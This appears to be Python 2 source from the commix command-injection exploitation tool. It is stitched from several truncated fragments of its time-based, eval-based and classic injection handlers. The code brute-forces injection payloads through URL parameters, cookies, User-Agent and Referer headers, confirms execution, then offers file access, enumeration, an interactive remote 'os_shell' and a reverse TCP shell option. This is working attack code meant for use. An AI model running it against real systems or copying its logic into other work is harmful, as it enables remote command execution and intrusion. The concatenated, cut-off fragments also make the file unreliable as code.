(url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Simple statical analysis statistical_anomaly = True if len(set(how_long_statistic[0:5])) == 1: if max(xrange(len(how_long_statistic)), key=lambda x: how_long_statistic[x]) == len(TAG) - 1: statistical_anomaly = False how_long_statistic = [] if delay <= how_long and not statistical_anomaly: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning: warn_msg = "Unexpected time delays have been identified due to unstable " warn_msg += "requests. This behavior may lead to false-positive results.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) while True: question_msg = "How do you want to proceed? [(C)ontinue/(s)kip/(q)uit] > " sys.stdout.write(settings.print_question_msg(question_msg)) proceed_option = sys.stdin.readline().replace("\n","").lower() if proceed_option.lower() in settings.CHOICE_PROCEED : if proceed_option.lower() == "s": false_positive_fixation = False raise elif proceed_option.lower() == "c": delay = delay + 1 false_positive_fixation = True break elif proceed_option.lower() == "q": raise SystemExit() else: if proceed_option == "": proceed_option = "enter" err_msg = "'" + proceed_option + "' is not a valid answer." print settings.print_error_msg(err_msg) pass # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay if false_positive_warning: time.sleep(1) randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_DIR + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str(randv1) + " + " + str(randv2) + ")" else: cmd = "echo $((" + str(randv1) + " + " + str(randv2) + "))" # Check for false positive resutls how_long, output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if str(output) == str(randvcalc) and len(TAG) == output_length: possibly_vulnerable = True how_long_statistic = 0 if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" #break else: break # False positive else: if not settings.VERBOSITY_LEVEL >= 1: percent = str(float_percent)+ "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: if not settings.VERBOSITY_LEVEL >= 1: percent = str(float_percent)+ "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except: percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.RED + "FAILED" + Style.RESET_ALL info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: percent = "" else: percent = str(float_percent) + "%" print "" # Print logs notification message logs.logs_notification(filename) #raise else: percent = str(float_percent) + "%" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if (len(TAG) == output_length) and \ (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level): found = True no_result = False if settings.LOAD_SESSION: possibly_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The" if found_vuln_parameter == " ": success_msg += http_request_method + "" success_msg += the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable=menu.options.level) #possibly_vulnerable = False else: settings.LOAD_SESSION = False # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.TARGET_OS == "win": time.sleep(1) new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() if enumerate_again in settings.CHOICE_YES: tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print "" break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : print "" while True: question_msg = "Do you want to access files again? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() if file_access_again in settings.CHOICE_YES: tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print "" tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: check_how_long, output = tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) if not new_line : print "" try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: if false_positive_warning: warn_msg = "Due to unexpected time delays, it is highly " warn_msg += "recommended to enable the 'reverse_tcp' option.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) false_positive_warning = False try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": warn_msg = "You are already into an 'os_shell' mode." print settings.print_warning_msg(warn_msg)+ "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. from src.core.injections.results_based.techniques.classic import cb_injector separator = checks.time_based_separators(separator, http_request_method) whitespace = settings.WHITESPACE[0] response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG, cmd) if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The reverse TCP connection has failed!" print settings.print_critical_msg(err_msg) else: pass else: print "" if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, output, vuln_parameter) else: output = session_handler.export_stored_cmd(url, cmd, vuln_parameter) print Fore.GREEN + Style.BRIGHT + output + "\n" + Style.RESET_ALL except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input(
def eb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "Results-based Command Injection" technique = "eval-based code injection technique" for item in range(0, len(settings.EXECUTION_FUNCTIONS)): settings.EXECUTION_FUNCTIONS[ item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "(" settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS url = eb_injector.warning_detection(url, http_request_method) sys.stdout.write("(*) Testing the " + technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len( settings.EVAL_SUFFIXES) for prefix in settings.EVAL_PREFIXES: for suffix in settings.EVAL_SUFFIXES: for separator in settings.EVAL_SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = eb_payloads.decision_alter_shell( separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = eb_payloads.decision(separator, TAG, randv1, randv2) suffix = urllib.quote(suffix) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) payload = payload + TAG + "" if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: payload = re.sub(" ", "%20", payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = eb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = eb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = eb_injector.referer_injection_test( url, vuln_parameter, payload) else: found_cookie_injection = False # Check if target host is vulnerable. response, vuln_parameter = eb_injector.injection_test( payload, http_request_method, url) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate test results. shell = eb_injector.injection_test_results( response, TAG, randvcalc) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if shell == False: sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + float_percent + "%" + " ]") sys.stdout.flush() if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent) + "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", payload) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input( "\n(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: eb_enumeration.do_check( separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: if not menu.options.verbose: print "" eb_file_access.do_check( separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) # Check if defined single cmd. if menu.options.os_cmd: eb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input( "(?) Do you want a Pseudo-Terminal? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp( ) while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( lhost) else: cmd = reverse_tcp.reverse_tcp_options( lhost, lport) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: settings.REVERSE_TCP = False go_back_again = True break # Command execution results. response = eb_injector.injection( separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = eb_injector.injection_results( response, TAG) print shell if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection has been failed!" + Style.RESET_ALL else: pass else: # The main command injection exploitation. response = eb_injector.injection( separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Command execution results. shell = eb_injector.injection_results( response, TAG) if shell: shell = "".join( str(p) for p in shell).replace( " ", "", 1)[:-1] if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def cb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Results-based Command Injection" technique = "classic injection technique" sys.stdout.write("(*) Testing the " + technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len( settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell( separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision( separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: if separator == " ": payload = re.sub(" ", "%20", payload) else: payload = re.sub(" ", whitespace, payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = cb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = cb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = cb_injector.referer_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test( payload, http_request_method, url) # Evaluate test results. shell = cb_injector.injection_test_results( response, TAG, randvcalc) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent) + "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", payload) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input( "\n(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: print "" cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Check if defined single cmd. if 